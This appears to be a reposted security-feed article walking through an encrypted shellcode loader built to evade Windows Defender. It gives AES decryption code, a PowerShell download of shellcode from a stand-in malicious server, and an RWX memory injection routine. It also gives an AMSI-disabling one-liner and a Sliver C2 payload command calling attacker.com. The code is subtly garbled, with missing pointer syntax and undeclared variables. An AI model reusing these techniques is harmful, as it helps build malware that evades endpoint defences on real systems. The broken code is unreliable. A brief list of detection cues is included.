Listen to this Post
Learn how to apply AES encryption and use payload staging to download shellcode from a remote server, decrypt it, and inject it into the current process to receive a beacon from your Sliver C2, bypassing Windows Defender and Real-Time Monitoring.
🔗 Reference: Offensive C – Shellcode Encryption and Staging
You Should Know:
1. AES Encryption & Decryption in C
AES (Advanced Encryption Standard) is widely used for encrypting shellcode to evade detection. Below is a sample C code snippet for AES decryption:
include <openssl/aes.h>
include <string.h>
void decrypt_shellcode(unsigned char encrypted_shellcode, int shellcode_len, unsigned char key, unsigned char iv) {
AES_KEY aes_key;
AES_set_decrypt_key(key, 256, &aes_key);
AES_cbc_encrypt(encrypted_shellcode, decrypted_shellcode, shellcode_len, &aes_key, iv, AES_DECRYPT);
}
2. Payload Staging with PowerShell
To download encrypted shellcode from a remote server:
$url = "http://malicious-server.com/encrypted_shellcode.bin" $encrypted_shellcode = (Invoke-WebRequest -Uri $url -UseBasicParsing).Content
3. Shellcode Injection in Windows
Use Windows API calls to inject decrypted shellcode into memory:
include <windows.h>
void inject_shellcode(unsigned char shellcode, int length) {
void exec_mem = VirtualAlloc(0, length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(exec_mem, shellcode, length);
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
}
4. Bypassing Windows Defender
- Obfuscation: XOR encryption before AES.
- Process Hollowing: Inject into a legitimate process.
- AMSI Bypass: Disable AMSI scanning in PowerShell.
[bash].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
5. Sliver C2 Integration
Generate staged payload in Sliver:
sliver > generate --mtls attacker.com --save /tmp/staged.bin --format shellcode
What Undercode Say:
This technique demonstrates how encryption and staging can bypass modern EDR solutions. However, defenders can detect such behavior by:
– Monitoring unusual PowerShell web requests.
– Analyzing RWX memory allocations.
– Detecting AES decryption patterns in process memory.
For red teams, always:
- Use custom encryption keys per engagement.
- Test against multiple AV/EDR solutions.
- Chain multiple evasion techniques.
Prediction:
As EDR solutions improve, attackers will increasingly adopt:
- Polymorphic shellcode (changing encryption keys dynamically).
- Legitimate process spoofing (mimicking trusted apps).
- AI-based payload generation (evading static signatures).
Expected Output:
A functional encrypted shellcode loader that bypasses Defender and integrates with Sliver C2.
🔗 Further Reading:
IT/Security Reporter URL:
Reported By: Nirajkharel Offensive – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
